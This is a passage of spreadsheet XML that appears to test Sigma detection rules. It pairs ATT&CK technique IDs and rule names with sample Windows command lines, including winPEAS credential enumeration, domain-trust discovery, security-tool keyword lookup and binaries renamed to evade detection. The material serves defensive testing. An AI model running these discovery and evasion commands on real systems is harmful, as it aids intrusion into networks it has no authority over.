      <c r="I1533" s="43" t="n"/>
      <c r="J1533" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1533" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1534" ht="15.75" customHeight="1" s="42">
      <c r="A1534" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1534" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C1534" s="43" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D1534" s="43" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E1534" s="43" t="inlineStr">
        <is>
          <t>winPEAS.exe  windows creds</t>
        </is>
      </c>
      <c r="F1534" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1534" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1534" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1534" s="43" t="n"/>
      <c r="J1534" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1534" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1535" ht="15.75" customHeight="1" s="42">
      <c r="A1535" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1535" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C1535" s="43" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D1535" s="43" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E1535" s="43" t="inlineStr">
        <is>
          <t>winPEAS.exe --windowscreds</t>
        </is>
      </c>
      <c r="F1535" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1535" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1535" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1535" s="43" t="n"/>
      <c r="J1535" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1535" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1536" ht="15.75" customHeight="1" s="42">
      <c r="A1536" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1536" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_machineguid</t>
        </is>
      </c>
      <c r="C1536" s="43" t="inlineStr">
        <is>
          <t>Suspicious Query of MachineGUID</t>
        </is>
      </c>
      <c r="D1536" s="43" t="inlineStr">
        <is>
          <t>f5240972-3938-4e56-8e4b-e33893176c1f</t>
        </is>
      </c>
      <c r="E1536" s="43" t="inlineStr">
        <is>
          <t>REG   QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography   /v   MachineGuid</t>
        </is>
      </c>
      <c r="F1536" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1536" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1536" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1536" s="43" t="n"/>
      <c r="J1536" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1536" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1537" ht="15.75" customHeight="1" s="42">
      <c r="A1537" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1537" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_machineguid</t>
        </is>
      </c>
      <c r="C1537" s="43" t="inlineStr">
        <is>
          <t>Suspicious Query of MachineGUID</t>
        </is>
      </c>
      <c r="D1537" s="43" t="inlineStr">
        <is>
          <t>f5240972-3938-4e56-8e4b-e33893176c1f</t>
        </is>
      </c>
      <c r="E1537" s="43" t="inlineStr">
        <is>
          <t>REG  QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography"  /v  MachineGuid</t>
        </is>
      </c>
      <c r="F1537" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1537" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1537" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1537" s="43" t="n"/>
      <c r="J1537" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1537" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1538" ht="15.75" customHeight="1" s="42">
      <c r="A1538" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1538" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_machineguid</t>
        </is>
      </c>
      <c r="C1538" s="43" t="inlineStr">
        <is>
          <t>Suspicious Query of MachineGUID</t>
        </is>
      </c>
      <c r="D1538" s="43" t="inlineStr">
        <is>
          <t>f5240972-3938-4e56-8e4b-e33893176c1f</t>
        </is>
      </c>
      <c r="E1538" s="43" t="inlineStr">
        <is>
          <t>REG  QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography  /v  MachineGuid  &gt;  NUL</t>
        </is>
      </c>
      <c r="F1538" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1538" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1538" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1538" s="43" t="n"/>
      <c r="J1538" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1538" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1539" ht="15.75" customHeight="1" s="42">
      <c r="A1539" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1539" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_machineguid</t>
        </is>
      </c>
      <c r="C1539" s="43" t="inlineStr">
        <is>
          <t>Suspicious Query of MachineGUID</t>
        </is>
      </c>
      <c r="D1539" s="43" t="inlineStr">
        <is>
          <t>f5240972-3938-4e56-8e4b-e33893176c1f</t>
        </is>
      </c>
      <c r="E1539" s="43" t="inlineStr">
        <is>
          <t>REG  QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography  /v  MachineGuid  |  findstr  MachineGuid</t>
        </is>
      </c>
      <c r="F1539" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1539" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1539" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1539" s="43" t="n"/>
      <c r="J1539" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1539" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1540" ht="15.75" customHeight="1" s="42">
      <c r="A1540" s="43" t="inlineStr">
        <is>
          <t>t1482</t>
        </is>
      </c>
      <c r="B1540" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dsquery_domain_trust_discovery</t>
        </is>
      </c>
      <c r="C1540" s="43" t="inlineStr">
        <is>
          <t>Domain Trust Discovery Via Dsquery</t>
        </is>
      </c>
      <c r="D1540" s="43" t="inlineStr">
        <is>
          <t>3bad990e-4848-4a78-9530-b427d854aac0</t>
        </is>
      </c>
      <c r="E1540" s="43" t="inlineStr">
        <is>
          <t>dsquery * -filter "(objectClass=trustedDomain)" -attr *</t>
        </is>
      </c>
      <c r="F1540" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1540" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1540" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1540" s="43" t="n"/>
      <c r="J1540" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1540" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1541" ht="15.75" customHeight="1" s="42">
      <c r="A1541" s="43" t="inlineStr">
        <is>
          <t>t1482</t>
        </is>
      </c>
      <c r="B1541" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dsquery_domain_trust_discovery</t>
        </is>
      </c>
      <c r="C1541" s="43" t="inlineStr">
        <is>
          <t>Domain Trust Discovery Via Dsquery</t>
        </is>
      </c>
      <c r="D1541" s="43" t="inlineStr">
        <is>
          <t>3bad990e-4848-4a78-9530-b427d854aac0</t>
        </is>
      </c>
      <c r="E1541" s="43" t="inlineStr">
        <is>
          <t>dsquery * -filter (objectClass=trustedDomain) -attr *</t>
        </is>
      </c>
      <c r="F1541" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1541" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1541" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1541" s="43" t="n"/>
      <c r="J1541" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1541" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1542" ht="15.75" customHeight="1" s="42">
      <c r="A1542" s="43" t="inlineStr">
        <is>
          <t>t1482</t>
        </is>
      </c>
      <c r="B1542" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dsquery_domain_trust_discovery</t>
        </is>
      </c>
      <c r="C1542" s="43" t="inlineStr">
        <is>
          <t>Domain Trust Discovery Via Dsquery</t>
        </is>
      </c>
      <c r="D1542" s="43" t="inlineStr">
        <is>
          <t>3bad990e-4848-4a78-9530-b427d854aac0</t>
        </is>
      </c>
      <c r="E1542" s="43" t="inlineStr">
        <is>
          <t>dsquery -attr * * -filter (objectClass=trustedDomain)</t>
        </is>
      </c>
      <c r="F1542" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1542" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1542" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1542" s="43" t="n"/>
      <c r="J1542" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1542" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1543" ht="15.75" customHeight="1" s="42">
      <c r="A1543" s="43" t="inlineStr">
        <is>
          <t>t1482</t>
        </is>
      </c>
      <c r="B1543" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dsquery_domain_trust_discovery</t>
        </is>
      </c>
      <c r="C1543" s="43" t="inlineStr">
        <is>
          <t>Domain Trust Discovery Via Dsquery</t>
        </is>
      </c>
      <c r="D1543" s="43" t="inlineStr">
        <is>
          <t>3bad990e-4848-4a78-9530-b427d854aac0</t>
        </is>
      </c>
      <c r="E1543" s="43" t="inlineStr">
        <is>
          <t>dsquery * -filter (objectClass=trustedDomain) -a *</t>
        </is>
      </c>
      <c r="F1543" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1543" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1543" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1543" s="43" t="n"/>
      <c r="J1543" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1543" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1544" ht="15.75" customHeight="1" s="42">
      <c r="A1544" s="43" t="inlineStr">
        <is>
          <t>t1135</t>
        </is>
      </c>
      <c r="B1544" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_explorer_folder_shortcut_via_shell_binary</t>
        </is>
      </c>
      <c r="C1544" s="43" t="inlineStr">
        <is>
          <t>File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell</t>
        </is>
      </c>
      <c r="D1544" s="43" t="inlineStr">
        <is>
          <t>c3d76afc-93df-461e-8e67-9b2bad3f2ac4</t>
        </is>
      </c>
      <c r="E1544" s="43" t="inlineStr">
        <is>
          <t>explorer.exe shell:mycomputerfolder</t>
        </is>
      </c>
      <c r="F1544" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1544" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1544" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1544" s="43" t="n"/>
      <c r="J1544" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1544" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1545" ht="15.75" customHeight="1" s="42">
      <c r="A1545" s="43" t="inlineStr">
        <is>
          <t>t1135</t>
        </is>
      </c>
      <c r="B1545" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_explorer_folder_shortcut_via_shell_binary</t>
        </is>
      </c>
      <c r="C1545" s="43" t="inlineStr">
        <is>
          <t>File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell</t>
        </is>
      </c>
      <c r="D1545" s="43" t="inlineStr">
        <is>
          <t>c3d76afc-93df-461e-8e67-9b2bad3f2ac4</t>
        </is>
      </c>
      <c r="E1545" s="43" t="inlineStr">
        <is>
          <t>explorer.exe  shell:mycomputerfolder</t>
        </is>
      </c>
      <c r="F1545" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1545" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1545" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1545" s="43" t="n"/>
      <c r="J1545" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1545" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1546" ht="15.75" customHeight="1" s="42">
      <c r="A1546" s="43" t="inlineStr">
        <is>
          <t>t1135</t>
        </is>
      </c>
      <c r="B1546" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_explorer_folder_shortcut_via_shell_binary</t>
        </is>
      </c>
      <c r="C1546" s="43" t="inlineStr">
        <is>
          <t>File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell</t>
        </is>
      </c>
      <c r="D1546" s="43" t="inlineStr">
        <is>
          <t>c3d76afc-93df-461e-8e67-9b2bad3f2ac4</t>
        </is>
      </c>
      <c r="E1546" s="43" t="inlineStr">
        <is>
          <t>explorer.exe shell:mycomputerfolder::</t>
        </is>
      </c>
      <c r="F1546" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1546" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1546" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1546" s="43" t="n"/>
      <c r="J1546" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1546" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1547" ht="15.75" customHeight="1" s="42">
      <c r="A1547" s="43" t="inlineStr">
        <is>
          <t>t1135</t>
        </is>
      </c>
      <c r="B1547" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_explorer_folder_shortcut_via_shell_binary</t>
        </is>
      </c>
      <c r="C1547" s="43" t="inlineStr">
        <is>
          <t>File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell</t>
        </is>
      </c>
      <c r="D1547" s="43" t="inlineStr">
        <is>
          <t>c3d76afc-93df-461e-8e67-9b2bad3f2ac4</t>
        </is>
      </c>
      <c r="E1547" s="43" t="inlineStr">
        <is>
          <t>explorer.exe ::{20D04FE0-3AEA-1069-A2D8-08002B30309D}</t>
        </is>
      </c>
      <c r="F1547" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1547" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1547" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1547" s="43" t="n"/>
      <c r="J1547" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1547" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1548" ht="15.75" customHeight="1" s="42">
      <c r="A1548" s="43" t="inlineStr">
        <is>
          <t>t1135</t>
        </is>
      </c>
      <c r="B1548" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_explorer_folder_shortcut_via_shell_binary</t>
        </is>
      </c>
      <c r="C1548" s="43" t="inlineStr">
        <is>
          <t>File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell</t>
        </is>
      </c>
      <c r="D1548" s="43" t="inlineStr">
        <is>
          <t>c3d76afc-93df-461e-8e67-9b2bad3f2ac4</t>
        </is>
      </c>
      <c r="E1548" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c explorer.exe shell:mycomputerfolder</t>
        </is>
      </c>
      <c r="F1548" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1548" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1548" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1548" s="43" t="n"/>
      <c r="J1548" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1548" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1549" ht="15.75" customHeight="1" s="42">
      <c r="A1549" s="43" t="inlineStr">
        <is>
          <t>t1135</t>
        </is>
      </c>
      <c r="B1549" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_explorer_folder_shortcut_via_shell_binary</t>
        </is>
      </c>
      <c r="C1549" s="43" t="inlineStr">
        <is>
          <t>File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell</t>
        </is>
      </c>
      <c r="D1549" s="43" t="inlineStr">
        <is>
          <t>c3d76afc-93df-461e-8e67-9b2bad3f2ac4</t>
        </is>
      </c>
      <c r="E1549" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Start-Process explorer.exe -ArgumentList 'shell:mycomputerfolder'"</t>
        </is>
      </c>
      <c r="F1549" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1549" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1549" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1549" s="43" t="n"/>
      <c r="J1549" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1549" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1550" ht="15.75" customHeight="1" s="42">
      <c r="A1550" s="43" t="inlineStr">
        <is>
          <t>t1135</t>
        </is>
      </c>
      <c r="B1550" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_explorer_folder_shortcut_via_shell_binary</t>
        </is>
      </c>
      <c r="C1550" s="43" t="inlineStr">
        <is>
          <t>File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell</t>
        </is>
      </c>
      <c r="D1550" s="43" t="inlineStr">
        <is>
          <t>c3d76afc-93df-461e-8e67-9b2bad3f2ac4</t>
        </is>
      </c>
      <c r="E1550" s="43" t="inlineStr">
        <is>
          <t>pwsh.exe -c "Start-Process explorer.exe -ArgumentList 'shell:mycomputerfolder'"</t>
        </is>
      </c>
      <c r="F1550" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1550" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1550" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1550" s="43" t="n"/>
      <c r="J1550" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1550" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1551" ht="15.75" customHeight="1" s="42">
      <c r="A1551" s="43" t="inlineStr">
        <is>
          <t>t1518.001</t>
        </is>
      </c>
      <c r="B1551" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_security_keyword_lookup</t>
        </is>
      </c>
      <c r="C1551" s="43" t="inlineStr">
        <is>
          <t>Security Tools Keyword Lookup Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D1551" s="43" t="inlineStr">
        <is>
          <t>4fe074b4-b833-4081-8f24-7dcfeca72b42</t>
        </is>
      </c>
      <c r="E1551" s="43" t="inlineStr">
        <is>
          <t>findstr /i "virus cb defender cylance mc"</t>
        </is>
      </c>
      <c r="F1551" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1551" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1551" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1551" s="43" t="n"/>
      <c r="J1551" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1551" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1552" ht="15.75" customHeight="1" s="42">
      <c r="A1552" s="43" t="inlineStr">
        <is>
          <t>t1518.001</t>
        </is>
      </c>
      <c r="B1552" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_security_keyword_lookup</t>
        </is>
      </c>
      <c r="C1552" s="43" t="inlineStr">
        <is>
          <t>Security Tools Keyword Lookup Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D1552" s="43" t="inlineStr">
        <is>
          <t>4fe074b4-b833-4081-8f24-7dcfeca72b42</t>
        </is>
      </c>
      <c r="E1552" s="43" t="inlineStr">
        <is>
          <t>findstr /i 'virus cb defender cylance mc'</t>
        </is>
      </c>
      <c r="F1552" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1552" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1552" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1552" s="43" t="n"/>
      <c r="J1552" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1552" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1553" ht="15.75" customHeight="1" s="42">
      <c r="A1553" s="43" t="inlineStr">
        <is>
          <t>t1518.001</t>
        </is>
      </c>
      <c r="B1553" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_security_keyword_lookup</t>
        </is>
      </c>
      <c r="C1553" s="43" t="inlineStr">
        <is>
          <t>Security Tools Keyword Lookup Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D1553" s="43" t="inlineStr">
        <is>
          <t>4fe074b4-b833-4081-8f24-7dcfeca72b42</t>
        </is>
      </c>
      <c r="E1553" s="43" t="inlineStr">
        <is>
          <t>findstr -i "virus cb defender cylance mc"</t>
        </is>
      </c>
      <c r="F1553" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1553" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1553" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1553" s="43" t="n"/>
      <c r="J1553" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1553" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1554" ht="15.75" customHeight="1" s="42">
      <c r="A1554" s="43" t="inlineStr">
        <is>
          <t>t1518.001</t>
        </is>
      </c>
      <c r="B1554" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_security_keyword_lookup</t>
        </is>
      </c>
      <c r="C1554" s="43" t="inlineStr">
        <is>
          <t>Security Tools Keyword Lookup Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D1554" s="43" t="inlineStr">
        <is>
          <t>4fe074b4-b833-4081-8f24-7dcfeca72b42</t>
        </is>
      </c>
      <c r="E1554" s="43" t="inlineStr">
        <is>
          <t>findstr /i "virus" "cb" "defender" "cylance" "mc"</t>
        </is>
      </c>
      <c r="F1554" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1554" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1554" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1554" s="43" t="n"/>
      <c r="J1554" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1554" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1555" ht="15.75" customHeight="1" s="42">
      <c r="A1555" s="43" t="inlineStr">
        <is>
          <t>t1518.001</t>
        </is>
      </c>
      <c r="B1555" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_sysmon_discovery_via_default_altitude</t>
        </is>
      </c>
      <c r="C1555" s="43" t="inlineStr">
        <is>
          <t>Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE</t>
        </is>
      </c>
      <c r="D1555" s="43" t="inlineStr">
        <is>
          <t>37db85d1-b089-490a-a59a-c7b6f984f480</t>
        </is>
      </c>
      <c r="E1555" s="43" t="inlineStr">
        <is>
          <t>findstr.exe 385201</t>
        </is>
      </c>
      <c r="F1555" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1555" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1555" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1555" s="43" t="n"/>
      <c r="J1555" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1555" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1556" ht="15.75" customHeight="1" s="42">
      <c r="A1556" s="43" t="inlineStr">
        <is>
          <t>t1518.001</t>
        </is>
      </c>
      <c r="B1556" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_sysmon_discovery_via_default_altitude</t>
        </is>
      </c>
      <c r="C1556" s="43" t="inlineStr">
        <is>
          <t>Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE</t>
        </is>
      </c>
      <c r="D1556" s="43" t="inlineStr">
        <is>
          <t>37db85d1-b089-490a-a59a-c7b6f984f480</t>
        </is>
      </c>
      <c r="E1556" s="43" t="inlineStr">
        <is>
          <t>findstr.exe $altitude</t>
        </is>
      </c>
      <c r="F1556" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1556" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1556" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1556" s="43" t="n"/>
      <c r="J1556" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1556" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1557" ht="15.75" customHeight="1" s="42">
      <c r="A1557" s="43" t="inlineStr">
        <is>
          <t>t1120</t>
        </is>
      </c>
      <c r="B1557" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_drive_enumeration</t>
        </is>
      </c>
      <c r="C1557" s="43" t="inlineStr">
        <is>
          <t>Fsutil Drive Enumeration</t>
        </is>
      </c>
      <c r="D1557" s="43" t="inlineStr">
        <is>
          <t>63de06b9-a385-40b5-8b32-73f2b9ef84b6</t>
        </is>
      </c>
      <c r="E1557" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c fsutil fsinfo drives</t>
        </is>
      </c>
      <c r="F1557" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1557" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1557" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1557" s="43" t="n"/>
      <c r="J1557" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1557" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1558" ht="15.75" customHeight="1" s="42">
      <c r="A1558" s="43" t="inlineStr">
        <is>
          <t>t1120</t>
        </is>
      </c>
      <c r="B1558" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_drive_enumeration</t>
        </is>
      </c>
      <c r="C1558" s="43" t="inlineStr">
        <is>
          <t>Fsutil Drive Enumeration</t>
        </is>
      </c>
      <c r="D1558" s="43" t="inlineStr">
        <is>
          <t>63de06b9-a385-40b5-8b32-73f2b9ef84b6</t>
        </is>
      </c>
      <c r="E1558" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "fsutil fsinfo drives"</t>
        </is>
      </c>
      <c r="F1558" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1558" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1558" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1558" s="43" t="n"/>
      <c r="J1558" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1558" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1559" ht="15.75" customHeight="1" s="42">
      <c r="A1559" s="43" t="inlineStr">
        <is>
          <t>t1615</t>
        </is>
      </c>
      <c r="B1559" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_gpresult_execution</t>
        </is>
      </c>
      <c r="C1559" s="43" t="inlineStr">
        <is>
          <t>Gpresult Display Group Policy Information</t>
        </is>
      </c>
      <c r="D1559" s="43" t="inlineStr">
        <is>
          <t>e56d3073-83ff-4021-90fe-c658e0709e72</t>
        </is>
      </c>
      <c r="E1559" s="43" t="inlineStr">
        <is>
          <t>gpresult /z</t>
        </is>
      </c>
      <c r="F1559" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1559" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1559" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1559" s="43" t="n"/>
      <c r="J1559" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1559" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1560" ht="15.75" customHeight="1" s="42">
      <c r="A1560" s="43" t="inlineStr">
        <is>
          <t>t1615</t>
        </is>
      </c>
      <c r="B1560" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_gpresult_execution</t>
        </is>
      </c>
      <c r="C1560" s="43" t="inlineStr">
        <is>
          <t>Gpresult Display Group Policy Information</t>
        </is>
      </c>
      <c r="D1560" s="43" t="inlineStr">
        <is>
          <t>e56d3073-83ff-4021-90fe-c658e0709e72</t>
        </is>
      </c>
      <c r="E1560" s="43" t="inlineStr">
        <is>
          <t>copy gpresult.exe not_gp.exe &amp;&amp; not_gp.exe /z</t>
        </is>
      </c>
      <c r="F1560" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1560" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1560" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1560" s="43" t="n"/>
      <c r="J1560" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1560" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1561" ht="15.75" customHeight="1" s="42">
      <c r="A1561" s="43" t="inlineStr">
        <is>
          <t>t1615</t>
        </is>
      </c>
      <c r="B1561" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpup</t>
        </is>
      </c>
      <c r="C1561" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpUp PrivEsc Tool Execution</t>
        </is>
      </c>
      <c r="D1561" s="43" t="inlineStr">
        <is>
          <t>c484e533-ee16-4a93-b6ac-f0ea4868b2f1</t>
        </is>
      </c>
      <c r="E1561" s="43" t="inlineStr">
        <is>
          <t>.\svchost_update.exe --all</t>
        </is>
      </c>
      <c r="F1561" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1561" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1561" s="43" t="b">
        <v>0</v>
      </c>
